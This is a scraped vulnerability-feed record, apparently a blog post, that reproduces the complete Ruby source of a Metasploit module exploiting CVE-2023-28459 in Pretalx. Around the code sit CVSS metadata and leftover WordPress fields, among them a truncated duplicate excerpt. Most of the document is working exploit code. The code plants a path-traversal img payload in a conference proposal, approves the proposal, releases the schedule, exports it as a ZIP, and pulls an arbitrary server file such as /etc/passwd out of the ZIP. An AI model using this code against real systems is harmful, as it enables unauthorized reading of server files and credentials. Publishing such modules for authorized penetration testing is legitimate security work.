{“lastseen”:”2025-08-29T19:54:51″,”description”:”This module exploits functionality in Pretalx that export conference schedule as zipped file. The Pretalx…”,”published”:”2025-08-28T18:53:45″,”modified”:”2025-08-29T18:53:27″,”type”:”metasploit”,”title”:”Pretalx Arbitrary File Read\/Limited File Write”,”source”:””,”references”:””,”id”:”MSF:AUXILIARY-SCANNER-HTTP-PRETALX_FILE_READ_CVE_2023_28459-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2023-28459″],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nrequire ‘zip’\\n\\nclass MetasploitModule \\u003c Msf::Auxiliary\\n\\n include Msf::Exploit::Remote::HTTP::Pretalx\\n include Msf::Auxiliary::Report\\n include Msf::Auxiliary::Scanner\\n prepend Msf::Exploit::Remote::AutoCheck\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Pretalx Arbitrary File Read\/Limited File Write’,\\n ‘Description’ =\\u003e ‘This module exploits functionality in Pretalx that export conference schedule as zipped file. The Pretalx will iteratively include any file referenced by any HTML tag and does not properly check the path of the file, which can lead to arbitrary file read. The module requires credentials that allow schedule export, schedule release and approval of proposals. Additionally, module requires conference name and URL for media files.’,\\n ‘Author’ =\\u003e [\\n ‘Stefan Schiller’, # security researcher\\n ‘msutovsky-r7’ # module dev\\n ],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\\n }\\n )\\n )\\n register_options([\\n OptString.new(‘FILEPATH’, [true, ‘The path to the file to read’, ‘\/etc\/passwd’]),\\n OptString.new(‘MEDIA_URL’, [true, ‘Prepend path to file path that allows arbitrary read’, ‘\/media’]),\\n OptString.new(‘EMAIL’, [true, ‘User email to Pretalx backend’]),\\n OptString.new(‘PASSWORD’, [true, ‘Password to Pretalx backend’])\\n ])\\n register_advanced_options([\\n OptInt.new(‘ExportTimeout’, [true, ‘Set wait time for schedule export’, 5])\\n ])\\n end\\n\\n def check_host(_ip)\\n return Exploit::CheckCode::Unknown(‘Login failed, please check credentials’) unless login(datastore[‘EMAIL’], datastore[‘PASSWORD’])\\n\\n version = get_version\\n\\n return Exploit::CheckCode::Detected unless version\\n\\n return Exploit::CheckCode::Appears(\\”Detected vulnerable version #{version}\\”) if version \\u003c= Rex::Version.new(‘2.3.1’)\\n\\n return Exploit::CheckCode::Safe(\\”Detected version #{version} is not vulnerable\\”)\\n rescue UnexpectedResponseError\\n return Exploit::CheckCode::Unknown(‘Received unexpected response, check your options’)\\n rescue VersionCheckError\\n return Exploit::CheckCode::Detected(‘Pretalx detected, failed to verify version’)\\n rescue CsrfError\\n return Exploit::CheckCode::Unknown(‘Failed to get CSRF token’)\\n rescue SessionCookieError\\n return Exploit::CheckCode::Detected(‘Pretalx detected, failed to get session cookie – check your credentials’)\\n end\\n\\n def run_host(ip)\\n vprint_status(‘Register malicious proposal’)\\n\\n proposal_info = {\\n abstract: %\\u003c(\\u003cimg src=\\”#{datastore[‘MEDIA_URL’]}\/\/#{datastore[‘FILEPATH’]}\\”\/\\u003e\\u003e,\\n email: datastore[‘EMAIL’],\\n password: datastore[‘PASSWORD’]\\n }\\n\\n registration_info = register_proposal(proposal_info)\\n proposal_name = registration_info[:proposal_name]\\n vprint_status(\\”Submit proposal #{proposal_name}\\”)\\n\\n vprint_status(\\”Logging with credentials: #{datastore[‘EMAIL’]}\/#{datastore[‘PASSWORD’]}\\”)\\n fail_with(Failure::NoAccess, ‘Incorrect credentials’) unless login(datastore[‘EMAIL’], datastore[‘PASSWORD’])\\n\\n vprint_status(‘Approving proposal’)\\n approve_proposal(proposal_name)\\n\\n vprint_status(\\”Adding #{proposal_name} to schedule\\”)\\n fail_with(Failure::Unknown, ‘Failed to add submission to schedule’) unless add_proposal_to_schedule(proposal_name)\\n vprint_status(‘Releasing schedule’)\\n release_schedule\\n\\n vprint_status(‘Exporting schedule’)\\n export_zip\\n\\n vprint_status(‘Wait for schedule ZIP to be exported’)\\n\\n sleep(datastore[‘ExportTimeout’])\\n\\n vprint_status(‘Trying to extract target file’)\\n\\n zip_data = download_zip\\n\\n zip = Zip::File.open_buffer(zip_data)\\n target_entry = zip.find_entry(\\”#{datastore[‘CONFERENCE_NAME’]}#{datastore[‘MEDIA_URL’]}#{datastore[‘FILEPATH’]}\\”)\\n fail_with Failure::PayloadFailed, ‘Failed to extract target file, check if export worked’ unless target_entry\\n extracted_content = zip.read(zip.find_entry(target_entry))\\n\\n vprint_status(‘Extraction successful’)\\n\\n loot_path = store_loot(\\n \\”pretalx.#{datastore[‘FILEPATH’]}\\”,\\n ‘text\/plain’,\\n ip,\\n extracted_content,\\n \\”pretalx-#{datastore[‘FILEPATH’]}.txt\\”,\\n ‘Pretalx’\\n )\\n print_status(\\”Stored results in #{loot_path}\\”)\\n\\n report_vuln({\\n host: rhost,\\n port: rport,\\n name: name,\\n refs: references,\\n info: \\”Module #{fullname} successfully leaked file\\”\\n })\\n end\\n\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/auxiliary\/scanner\/http\/pretalx_file_read_cve_2023_28459.rb”,”cvss”:{“score”:6.5,”severity”:”MEDIUM”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:N\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/pretalx_file_read_cve_2023_28459\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-08-29T19:54:51″,”description”:”This module exploits functionality in Pretalx that export conference schedule as zipped file. The Pretalx…”,”published”:”2025-08-28T18:53:45″,”modified”:”2025-08-29T18:53:27″,”type”:”metasploit”,”title”:”Pretalx Arbitrary File Read\/Limited File Write”,”source”:””,”references”:””,”id”:”MSF:AUXILIARY-SCANNER-HTTP-PRETALX_FILE_READ_CVE_2023_28459-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2023-28459″],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n#…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,26,12,21,169,13,7,11,5],"class_list":["post-15171","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-65","tag-exploit","tag-medium","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n